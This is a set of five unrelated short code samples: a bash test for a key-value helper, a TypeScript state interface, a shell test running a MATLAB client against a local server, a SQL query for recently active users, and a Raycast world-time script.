#!/bin/bash DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )" source $DIR/../bashdb.sh bashdb_set testdb a 1 value=$(bashdb_contains testdb a) if [ "$value" != "1" ]; then exit -1 fi
export interface RiskState { riskQueryResult: any[]; isLoading: boolean; error: Error; } export const initialState: RiskState = { riskQueryResult: [], isLoading: false, error: null };
#!/bin/sh -e printf "Running test_matlab_devices... " DIME_SOCKET="`mktemp -u`" ../server/dime -l "unix:$DIME_SOCKET" & DIME_PID=$! env MATLABPATH="../client/matlab" matlab -batch "test_matlab_devices('$DIME_SOCKET')" kill $DIME_PID printf "Done!\n"
SELECT users.name FROM users WHERE users.last_login_date >= CURDATE() - INTERVAL 7 DAY;
#!/usr/bin/env bash # Required parameters: # @raycast.schemaVersion 1 # @raycast.title World Time # @raycast.mode inline # @raycast.refreshTime 5s # @raycast.packageName Dashboard # Optional parameters: # @raycast.icon 🗺 # # Documentation: # @raycast.description Show the time from elsewhere in the world # @raycast.author Jesse Claven # @raycast.authorURL https://github.com/jesse-c # Timezones can be found in /usr/share/zoneinfo coo=$(TZ=Africa/Porto-Novo date +"%H:%M") tpe=$(TZ=Asia/Taipei date +"%H:%M") echo "Cotonou: $coo | Taipei: $tpe"